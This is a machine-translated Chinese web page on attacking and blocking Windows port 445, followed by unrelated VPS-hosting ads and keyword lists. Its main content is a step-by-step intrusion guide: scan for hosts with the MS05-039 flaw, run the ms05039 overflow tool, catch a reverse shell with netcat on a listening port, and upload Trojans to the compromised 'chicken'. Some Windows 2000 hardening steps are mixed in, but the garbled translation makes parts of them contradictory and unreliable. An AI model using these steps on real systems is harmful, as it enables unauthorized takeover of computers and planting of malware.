端口445端口(445 port)

445端口  时间:2021-04-18  阅读:()

445端口 445 port

Teach you 445 port attacks and prevention:

The 445 port is a port to get both praise and blame it, we caneasily access a variety of LAN in a shared folder or printersharing, but it is also because of it, hackers have a chance,they can pass through the port secretly sharing your hard drive,or even fall in your hard disk will be silent! What we can dois to think of away that hackers can take advantage of, blockingthe 445 port holes. For simplicity, in this paper, we takeWindows 2000 as an example, for Windows XP, the steps arebasically similar.

In the first step, what we need to do is to identify ahost with445 port vulnerabilities. You can scan it with scanning tools!SUPERSCAN, for example, is a port scanning tool.

The second step, assuming that we now have a host with a 445port vulnerability, we can use the Swiss Army knife NC and theoverflow tool ms05039 to attack:

F:\445>ms05039 target IP local IP 1234

. . . . . .

. . . . . .

F:\445>nc. exe -vv -l -p 1234

. . . . . .

. . . . . .

If you succeed, you will return to a shell, and then you canuse our usual commands. For example, let him download our Trojanhorse or upload a Trojan horse to him, and then run, so get achicken.

Do you think your computer is dangerous?Don't be afraid. Herewe are to remove this dangerous 445 port vulnerability:Attack methods against 445 port vulnerabilities:

1. port exclusion method

This method uses the port exclusion function of Windows 2000system, all packets from the 445 port will be banned

The evil guys can't get close to your mainframe, and here' s theconcrete implementation of this approach:

Open the start menu of the Windows 2000 system, select the"network and dial up connection" icon under the "Settings" item,right-click it, and click "Browse" command from the shortcutmenu;

In the next window, right-click the "Internet connection" icon,select the "attribute" option, and then pop up the Internetconnection property window;

Open the "regular" tab page, select the "Internet Protocol"(TCP/IP) item, and then click the "property" button to open the

Internet (TCP/IP) property settings page;

Click the page in the "advanced" button, open the advancedTCP/IP settings window, select the "options" label, and labelsin the pages of the "optional settings", "TCP/IP screen" isselected, and then click the "properties" button, open the TCP/IP screening set port;

The 445 port belongs to a TCP port, you can set at thecorresponding port "TCP", will "allow only" of selectedactivation following the "add" button, click the button in thewindow open by the add filter ", the service port number willmust be used, add come in, and will be less than the 445 portnumber excluded, after setting, click"OK"button, you can maketo take effect.

2. service shutdown method

Taking into account the folder or printer sharing service willuse to port 445, so directly to the folder or printer sharingservice stop, canalso realize the closure of 445 port to allowhackers to destroy all kinds of shared resources, the followingare the specific steps to close the folder or printer sharingservice:

Open the start menu of the Windows 2000 system, select the"network and dial up connection" icon under the "Settings" item,right-click it, and click "Browse" command from the shortcutmenu;

In the next window, right-click the "Internet connection" icon,

select the "attribute" option, and then pop up the Internetconnection property window;

Open the "regular" tab page,

And in"this connectionuses the following selected components"list box, the "Microsoft network file or printer sharing"option before the cancellation number canceled, as shown infigure 2. Finally, click the "OK"button to restart the system,and the "big villains" on Internet have no access to all kindsof shared resources.

Of course, you can not stop sharing service conditions,deprivedof"sharedaccess rights are thewicked"; use the localsecurity settings in the user rights assignment function,specify anyusers on Internet have the right to access the localhost specific steps:

In the Windows 2000 start menu system, click the "program" and"management tools" and "local security settings" option, andthen expand the security settings "and" local policy "" userrights assignment "folder in the corresponding right sub windowto select"deny access to this computer from the network"option,and with the mouse left click on the;

Open the settings window, click the Add button, the pop-up"select auser or group dialog box, select the" everyone"option,and then click the Add button, finally click" OK", so that anyone user can access from the network to the local host.First look for chickens with MS05-039 vulnerabilities, and the

bugs open 445 and 139 ports,

Scan with a scanner

Next, exploit a vulnerability tool to attack a remotecalculator

Open the command prompt and enter ms05039. exe 192. 168.0.3

192. 168.0. 2 44661

Mean: 192. 168.0. 3 chicken IP address, 192. 168.0.2 is the localIP address, 4466 successful remote computing data overflowchicken will be connected to port 4466 on the local computer,1 on behalf of the remote chicken is Chinese version, Englishset 0. When successful execution of remote data overflowoperation, there will be a hint of successful overflow, suchas:

Trying to connect to remote port on 192. 168.0.3:445. . .ESTABLI SHED

Maki ng, nul l, se ssi on. . . OK

Trying, to, bind, pipe. . . OK

Trying, to, send, craf ted, packet. . . OK

Exploit done! Check your reverse shell on 192. 168.0.2:4466When the overflow is successful, immediately use NC (called theSwiss Army knife) to monitor the data that bounces back to the

4466 port of the machine.

Restart a command prompt, enter the command: NC -vv (two V) -l-p 4466 for data monitoring,

It will soon be able to monitor a remote SHELL withadministrator privileges.

So far, it has successfully entered the remote chicken system.At this time, you can upload Trojan horses through FTP, TFTP,etc.

CloudCone:$14/年KVM-512MB/10GB/3TB/洛杉矶机房

CloudCone发布了2021年的闪售活动,提供了几款年付VPS套餐,基于KVM架构,采用Intel® Xeon® Silver 4214 or Xeon® E5s CPU及SSD硬盘组RAID10,最低每年14.02美元起,支持PayPal或者支付宝付款。这是一家成立于2017年的国外VPS主机商,提供VPS和独立服务器租用,数据中心为美国洛杉矶MC机房。下面列出几款年付套餐配置信息。CPU:...

火数云 55元/月BGP限时三折,独立服务器及站群限时8折,新乡、安徽、香港、美国

火数云怎么样?火数云主要提供数据中心基础服务、互联网业务解决方案,及专属服务器租用、云服务器、专属服务器托管、带宽租用等产品和服务。火数云提供洛阳、新乡、安徽、香港、美国等地骨干级机房优质资源,包括BGP国际多线网络,CN2点对点直连带宽以及国际顶尖品牌硬件。专注为个人开发者用户,中小型,大型企业用户提供一站式核心网络云端服务部署,促使用户云端部署化简为零,轻松快捷运用云计算!多年云计算领域服务经...

HostKvm 黑色星期五香港服务器终身六折 其余机房八折

HostKvm商家我们也不用多介绍,这个服务商来自国内某商家,旗下也有多个品牌的,每次看到推送信息都是几个服务商品牌一起推送的。当然商家还是比较稳定的,商家品牌比较多,这也是国内商家一贯的做法,这样广撒网。这次看到黑五优惠活动发布了,针对其主打的香港云服务器提供终身6折的优惠,其余机房服务器依然是8折,另还有充值50美元赠送5美元的优惠活动,有需要的可以看看。HostKvm是一个创建于2013年的...

445端口为你推荐
输入搜狗拼音输入法4uctuationchromebasedcss供应商iphoneitunes备份itunes就是备份不了怎么办啊google中国地图求教谷歌中国地图~手机如何使用?win7关闭135端口win7下怎么关135和8909端口firefoxflash插件火狐浏览器adobe flash player装了不能用routeadd如何用route add添加本地路由表,使一个网段的机器能访问另一个网段局域网的机器。望高手指点。chrome18CHROME现在最新版是多少?
百度域名 域名论坛 最新代理服务器ip t楼 awardspace 便宜域名 香港机房 圣迭戈 permitrootlogin 贵州电信宽带测速 evssl证书 商家促销 hnyd 刀片式服务器 阿里校园 phpmyadmin配置 qq对话框 稳定免费空间 如何用qq邮箱发邮件 环聊 更多